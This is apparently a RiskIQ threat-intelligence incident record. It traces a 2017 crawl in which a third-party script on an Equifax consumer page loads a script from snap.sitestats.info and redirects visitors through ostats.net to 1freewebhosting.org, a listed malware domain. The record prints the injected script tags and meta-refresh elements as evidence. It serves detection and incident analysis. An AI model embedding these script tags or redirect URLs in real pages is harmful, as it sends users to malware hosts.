RiskIQ :: Blocklist Incident - Reputation Match by Domain - ostats.net leads to 1freewebhosting.org

Blocklist Incident - Reputation Match by Domain - ostats.net leads to 1freewebhosting.org

Summary

Correlation:	Reputation
Matched By:	Domain
Matched Lists:	RiskIQ Malware List
Score:	21
Description:	riq.auto.model.scam REP host matched '1freewebhosting.org',riq.auto.model.malware REP host matched '1freewebhosting.org'

Incident Details

Id:	304821618
Incident Date:	2017-09-15 10:16 PM PDT
Cause:	meta.refresh
Blocklist Resource IP:	209.239.120.72
Blocklist Resource AS:	AS30083: Country: US Registry: arin SERVER4YOU - server4you Inc., US
Phishing:	false
Scam:	false
Malware:	true
Spam:	false
PUP:	false
Redir:	false
Inject:	false
Alexa Rank:	2147483647
Ad Type:	Display
Publisher Ad Network:	Akamai Technologies, Inc.
Delivering Ad Network:	Akamai Technologies, Inc.
Drive-By Malvertisement:	false

RiskIQ Malware List Details

Item ID:	44384258
URL:	http://1freewebhosting.org
Source:	RiskIQ
Match Type:	Host
Description:	riq.auto.model.malware REP host matched '1freewebhosting.org'
Score:	21
Target Brand:
First Detected At:	2017-02-03 12:38:38.0
First Found On Crawl:	4938829714

Blocklist Resource Details

URL:	http://1freewebhosting.org/
Sequence:	9
Response Code:	200
Content Type:	text/html
Referrer:	https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t
Cause:	meta.refresh
Location in Prior	<meta http-equiv="refresh" content="0; url=http://1freewebhosting.org"/>

Cause Page

Sequence in Crawl:	1
Guid:	ec96e2ed-f368-4a18-91a8-9c440bbced93
URL:	https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t
IP Address:	209.126.127.34
Window Name:	: TopLevelWindow@6e3cc4c2

Resulting Page

Sequence in Crawl:	1
Guid:	70750834-07c5-4a32-b134-75d2843c799e
URL:	http://telgrm.me/
IP Address:	54.72.9.51
Window Name:	: TopLevelWindow@6e3cc4c2

Crawl Details

Crawl Guid:	98056038-605e-4a9d-ab78-ed9f90b0a5de
Crawl Date:	2017-09-15 10:16 PM PDT
Frontier URL:	https://aa.econsumer.equifax.com
Metro Code:	none
Crawled Pages:	1
Error Pages:	0

Source Search

No Source Search Result found.

Sequence Overview

Sequence	URL	Ad Network	Cause	Response Code	Frame	Window	Parent Window	Lost Referrer	Referrer
1	https://aa.econsumer.equifax.com/	-	topLevelRedirect	200	true	true	: TopLevelWindow@6e3cc4c2	-
2	https://aa.econsumer.equifax.com/aad/landing.ehtml	-	meta.refresh	302	-	-	: TopLevelWindow@6e3cc4c2	true	https://aa.econsumer.equifax.c...
3	https://aa.econsumer.equifax.com/aad/noJavascript.ehtml	-	redirect	200	true	true	: TopLevelWindow@6e3cc4c2	-
4	https://aa.econsumer.equifax.com/aad/landing.ehtml	-	form.action	200	true	true	: TopLevelWindow@6e3cc4c2	-	https://aa.econsumer.equifax.c...
5	https://aa.econsumer.equifax.com/aad/uib/js/fireclick.js	-	script.src	200	-	-	: TopLevelWindow@6e3cc4c2	-	https://aa.econsumer.equifax.c...
6	https://a248.e.akamai.net/f/248/5462/3h/hints.netflame.cc/se...	Akamai Technologies, Inc.	script.src	200	-	-	: TopLevelWindow@6e3cc4c2	-	https://aa.econsumer.equifax.c...
7	https://snap.sitestats.info/f/content.php?s=%7B%22s%22:%22bE...	-	script.src	200	-	-	: TopLevelWindow@6e3cc4c2	-	https://aa.econsumer.equifax.c...
8	https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2Fm...	-	location.refresh	200	true	true	: TopLevelWindow@6e3cc4c2	-	https://aa.econsumer.equifax.c...
9	http://1freewebhosting.org/	-	meta.refresh	200	true	true	: TopLevelWindow@6e3cc4c2	true	https://ostats.net/?s=bEMrLJN0...

Sequence Details

1	https://aa.econsumer.equifax.com/ Referrer: Cause: topLevelRedirect

Contains Element :

<meta http-equiv="REFRESH" content="0; URL=https://aa.econsumer.equifax.com/aad/landing.ehtml"/>

2	https://aa.econsumer.equifax.com/aad/landing.ehtml Referrer: https://aa.econsumer.equifax.com/ Cause: meta.refresh Path from prior: `/html/head/meta/@content`

Redirects To :

3	https://aa.econsumer.equifax.com/aad/noJavascript.ehtml Referrer: Cause: redirect Path from prior: https://aa.econsumer.equifax.com/aad/noJavascript.ehtml

Contains Element :

<form action="landing.ehtml" method="POST"><input type="hidden" name="jscript" value="yes"/>
</form>

4	https://aa.econsumer.equifax.com/aad/landing.ehtml Referrer: https://aa.econsumer.equifax.com/aad/noJavascript.ehtml Cause: form.action Path from prior: `/*[name()='html']/body/form/@action`

Contains Element :

<script language="JavaScript" src="uib/js/fireclick.js"/>

5	https://aa.econsumer.equifax.com/aad/uib/js/fireclick.js Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml Cause: script.src Path from prior: `/*[name()='html']/body/div[1]/div/script[2]/@src`

Contains Source :

<script src="https://a248.e.akamai.net/f/248/5462/3h/hints.netflame.cc/service/script/www.annualcreditreport.com"/>

6	https://a248.e.akamai.net/f/248/5462/3h/hints.netflame.cc/service/script/www.annualcreditreport.com Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml Cause: script.src Path from prior: `/*[name()='html']/body/div[1]/div/script[3]/@src`

Contains Source :

<script src="https://snap.sitestats.info/f/content.php?s=%7B%22s%22:%22bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%252FmQKK%252FiWX1OA0zjNfIK9NgnaMOa73pEj%252F8kgDDR6dZJ1bXXBAINA%253D%253D%22,%22d%22:%7B%22rf%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22,%22src%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22%7D%7D"/>

7

https://snap.sitestats.info/f/content.php?s=%7B%22s%22:%22bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%252FmQKK%252FiWX1OA0zjNfIK9NgnaMOa73pEj%252F8kgDDR6dZJ1bXXBAINA%253D%253D%22,%22d%22:%7B%22rf%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22,%22src%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22%7D%7D

Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml

Cause: script.src Path from prior: /*[name()='html']/head/script[1]/@src

Changes Window Location To :

<script src="https://snap.sitestats.info/f/content.php?s=%7B%22s%22:%22bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%252FmQKK%252FiWX1OA0zjNfIK9NgnaMOa73pEj%252F8kgDDR6dZJ1bXXBAINA%253D%253D%22,%22d%22:%7B%22rf%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22,%22src%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22%7D%7D"/>

8	https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml Cause: location.refresh Path from prior: `/html/head/script[1]`

Contains Element :

<meta http-equiv="refresh" content="0; url=http://1freewebhosting.org"/>

9	http://1freewebhosting.org/ Referrer: https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t Cause: meta.refresh Path from prior: `/html/head/meta/@content`